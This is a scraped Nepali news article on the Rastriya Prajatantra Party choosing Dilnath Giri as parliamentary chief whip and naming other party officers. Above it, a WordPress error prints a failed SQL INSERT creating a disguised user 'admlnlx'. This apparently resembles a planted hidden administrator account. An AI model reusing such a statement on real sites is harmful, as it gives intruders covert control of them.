WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BueGEqZ6RK5zmhKVYcyFHyNH9RVq1I1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 21:14:47', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २४–
राष्ट्रिय प्रजातन्त्र पार्टी संसदीय दलको प्रमुख सचेतकमा दिलनाथ गिरी चयन हुनुभएको छ ।
पार्टीको आज बसेको संसदीय दलको बैठकले दलका सचेतकमा परशुराम तामाङ, सदस्य सचिवमा आनन्ददेवी पन्त तथा कोषाध्यक्षमा दिनेश श्रेष्ठलाई तोकेको छ ।
राष्ट्रिय प्रजातन्त्र पार्टी नेपाल र राप्रपाबीच एकीकरण भएपछि गिरी पुनःप्रमुख सचेतक बन्नुभएको हो । उहाँ यसअघि राप्रपा नेपालको प्रमुख सचेतक हुनुहुन्थ्यो ।
यसैगरी बैठकले सातवटै प्रदेशमा मङ्सिरको अन्तिम सातादेखि पुसको पहिलो सातासम्म प्रादेशिक बैठक गर्ने निर्णय गरेको राप्रपाका नेता राजाराम श्रेष्ठले जानकारी दिनुभयो ।